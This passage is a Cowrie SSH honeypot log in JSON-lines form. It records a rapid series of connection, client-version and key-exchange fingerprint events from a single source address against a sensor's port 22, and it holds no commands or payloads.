{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8170,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4541b10f978","protocol":"ssh","message":"New connection: 212.227.235.229:8170 (1.2.3.4:22) [session: d4541b10f978]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.314730Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8288,"dst_ip":"1.2.3.4","dst_port":22,"session":"e31d14d291a7","protocol":"ssh","message":"New connection: 212.227.235.229:8288 (1.2.3.4:22) [session: e31d14d291a7]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.315510Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8386,"dst_ip":"1.2.3.4","dst_port":22,"session":"58bb48fbd485","protocol":"ssh","message":"New connection: 212.227.235.229:8386 (1.2.3.4:22) [session: 58bb48fbd485]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.316226Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8392,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a0eea54f022","protocol":"ssh","message":"New connection: 212.227.235.229:8392 (1.2.3.4:22) [session: 6a0eea54f022]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.317218Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8284,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6a09a73a576","protocol":"ssh","message":"New connection: 212.227.235.229:8284 (1.2.3.4:22) [session: b6a09a73a576]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.318083Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8256,"dst_ip":"1.2.3.4","dst_port":22,"session":"2728192b2769","protocol":"ssh","message":"New connection: 212.227.235.229:8256 (1.2.3.4:22) [session: 2728192b2769]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.318888Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8232,"dst_ip":"1.2.3.4","dst_port":22,"session":"b22bea344e73","protocol":"ssh","message":"New connection: 212.227.235.229:8232 (1.2.3.4:22) [session: b22bea344e73]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.319675Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8294,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f01f0139fd2","protocol":"ssh","message":"New connection: 212.227.235.229:8294 (1.2.3.4:22) [session: 9f01f0139fd2]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.320330Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8372,"dst_ip":"1.2.3.4","dst_port":22,"session":"a015b407c6d9","protocol":"ssh","message":"New connection: 212.227.235.229:8372 (1.2.3.4:22) [session: a015b407c6d9]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.321153Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8366,"dst_ip":"1.2.3.4","dst_port":22,"session":"7710db0aaa0f","protocol":"ssh","message":"New connection: 212.227.235.229:8366 (1.2.3.4:22) [session: 7710db0aaa0f]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.321972Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8304,"dst_ip":"1.2.3.4","dst_port":22,"session":"29dcc0d31b57","protocol":"ssh","message":"New connection: 212.227.235.229:8304 (1.2.3.4:22) [session: 29dcc0d31b57]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.322731Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8444,"dst_ip":"1.2.3.4","dst_port":22,"session":"358a6c3a1814","protocol":"ssh","message":"New connection: 212.227.235.229:8444 (1.2.3.4:22) [session: 358a6c3a1814]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.323467Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8604,"dst_ip":"1.2.3.4","dst_port":22,"session":"be6ecc1fc7c4","protocol":"ssh","message":"New connection: 212.227.235.229:8604 (1.2.3.4:22) [session: be6ecc1fc7c4]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.324232Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8406,"dst_ip":"1.2.3.4","dst_port":22,"session":"7def5b455794","protocol":"ssh","message":"New connection: 212.227.235.229:8406 (1.2.3.4:22) [session: 7def5b455794]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.325047Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8318,"dst_ip":"1.2.3.4","dst_port":22,"session":"b09f07c8b5bd","protocol":"ssh","message":"New connection: 212.227.235.229:8318 (1.2.3.4:22) [session: b09f07c8b5bd]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.325910Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8482,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbd4d5328bbb","protocol":"ssh","message":"New connection: 212.227.235.229:8482 (1.2.3.4:22) [session: fbd4d5328bbb]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.326637Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8650,"dst_ip":"1.2.3.4","dst_port":22,"session":"028b156eed68","protocol":"ssh","message":"New connection: 212.227.235.229:8650 (1.2.3.4:22) [session: 028b156eed68]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.327470Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8826,"dst_ip":"1.2.3.4","dst_port":22,"session":"741a3a19b055","protocol":"ssh","message":"New connection: 212.227.235.229:8826 (1.2.3.4:22) [session: 741a3a19b055]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.328457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.329073Z","src_ip":"212.227.235.229","session":"61449104323e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.329702Z","src_ip":"212.227.235.229","session":"268b12906f8c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.330347Z","src_ip":"212.227.235.229","session":"6b767de709c9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.331002Z","src_ip":"212.227.235.229","session":"be641c7f0eea"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.331583Z","src_ip":"212.227.235.229","session":"0c7cb507cfa4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.332179Z","src_ip":"212.227.235.229","session":"4ebe652a4aef"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.332729Z","src_ip":"212.227.235.229","session":"054331afa073"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.333273Z","src_ip":"212.227.235.229","session":"bfb3ef0b06fd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.333966Z","src_ip":"212.227.235.229","session":"cac88380c723"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.334833Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.335356Z","src_ip":"212.227.235.229","session":"804cba12643e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.335964Z","src_ip":"212.227.235.229","session":"8c7ea15fbb02"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.336628Z","src_ip":"212.227.235.229","session":"c078af94a6a3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.337214Z","src_ip":"212.227.235.229","session":"50459e2ed94b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.337867Z","src_ip":"212.227.235.229","session":"6900bcd32cc5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.338476Z","src_ip":"212.227.235.229","session":"64a4edae596d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.339131Z","src_ip":"212.227.235.229","session":"010f3872944a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.339932Z","src_ip":"212.227.235.229","session":"4c0cece41bf3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.340447Z","src_ip":"212.227.235.229","session":"2cadf41aeac0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.341034Z","src_ip":"212.227.235.229","session":"da4fb51bdd71"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.341766Z","src_ip":"212.227.235.229","session":"a40d931b40cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8720,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e5f69d26905","protocol":"ssh","message":"New connection: 212.227.235.229:8720 (1.2.3.4:22) [session: 3e5f69d26905]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.342876Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8788,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed1d0d61800d","protocol":"ssh","message":"New connection: 212.227.235.229:8788 (1.2.3.4:22) [session: ed1d0d61800d]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.343744Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8762,"dst_ip":"1.2.3.4","dst_port":22,"session":"f62ba6c762f5","protocol":"ssh","message":"New connection: 212.227.235.229:8762 (1.2.3.4:22) [session: f62ba6c762f5]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.344578Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8746,"dst_ip":"1.2.3.4","dst_port":22,"session":"64c1a41e4ce3","protocol":"ssh","message":"New connection: 212.227.235.229:8746 (1.2.3.4:22) [session: 64c1a41e4ce3]","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.345337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.346142Z","src_ip":"212.227.235.229","session":"d99067db7f09"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.346898Z","src_ip":"212.227.235.229","session":"9d429f88c382"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.347602Z","src_ip":"212.227.235.229","session":"971dee2568ef"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.348192Z","src_ip":"212.227.235.229","session":"138d5c7e8716"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.348777Z","src_ip":"212.227.235.229","session":"2ff74d9e467a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.349408Z","src_ip":"212.227.235.229","session":"406ad0cd93dd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.350020Z","src_ip":"212.227.235.229","session":"d3fc4204b67a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.350586Z","src_ip":"212.227.235.229","session":"a7c0b3b3fe87"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.351310Z","src_ip":"212.227.235.229","session":"c48996c45439"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.352085Z","src_ip":"212.227.235.229","session":"12c310641a84"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.352767Z","src_ip":"212.227.235.229","session":"66cfba061dca"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.353271Z","src_ip":"212.227.235.229","session":"eb8fa707aa14"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.353844Z","src_ip":"212.227.235.229","session":"df568fdbbf70"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.354507Z","src_ip":"212.227.235.229","session":"73ffd5e8d59e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.355117Z","src_ip":"212.227.235.229","session":"ea6c7f2d675e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.355698Z","src_ip":"212.227.235.229","session":"c780870ec0bb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.358094Z","src_ip":"212.227.235.229","session":"4245a93d2efd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.358728Z","src_ip":"212.227.235.229","session":"05baf31ace39"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.359236Z","src_ip":"212.227.235.229","session":"578e4fefda86"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.359830Z","src_ip":"212.227.235.229","session":"9ca56bfd521e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.360494Z","src_ip":"212.227.235.229","session":"c471bc8cf228"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.361095Z","src_ip":"212.227.235.229","session":"b318c1207969"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.361654Z","src_ip":"212.227.235.229","session":"1faa2175da37"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.362393Z","src_ip":"212.227.235.229","session":"d4541b10f978"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.363071Z","src_ip":"212.227.235.229","session":"e31d14d291a7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.363635Z","src_ip":"212.227.235.229","session":"58bb48fbd485"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.364499Z","src_ip":"212.227.235.229","session":"6a0eea54f022"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.365466Z","src_ip":"212.227.235.229","session":"b6a09a73a576"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.366375Z","src_ip":"212.227.235.229","session":"2728192b2769"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.366962Z","src_ip":"212.227.235.229","session":"b22bea344e73"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.367477Z","src_ip":"212.227.235.229","session":"9f01f0139fd2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.368012Z","src_ip":"212.227.235.229","session":"a015b407c6d9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.368593Z","src_ip":"212.227.235.229","session":"7710db0aaa0f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.369152Z","src_ip":"212.227.235.229","session":"29dcc0d31b57"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.369817Z","src_ip":"212.227.235.229","session":"358a6c3a1814"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.370629Z","src_ip":"212.227.235.229","session":"be6ecc1fc7c4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.371515Z","src_ip":"212.227.235.229","session":"7def5b455794"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.372294Z","src_ip":"212.227.235.229","session":"b09f07c8b5bd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.372975Z","src_ip":"212.227.235.229","session":"fbd4d5328bbb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.373516Z","src_ip":"212.227.235.229","session":"028b156eed68"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.374040Z","src_ip":"212.227.235.229","session":"741a3a19b055"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.375100Z","src_ip":"212.227.235.229","session":"3e5f69d26905"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.375900Z","src_ip":"212.227.235.229","session":"ed1d0d61800d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.376743Z","src_ip":"212.227.235.229","session":"f62ba6c762f5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.377326Z","src_ip":"212.227.235.229","session":"64c1a41e4ce3"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.378148Z","src_ip":"212.227.235.229","session":"77edc7263a7b"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.418725Z","src_ip":"212.227.235.229","session":"61449104323e"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.421494Z","src_ip":"212.227.235.229","session":"6b767de709c9"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","a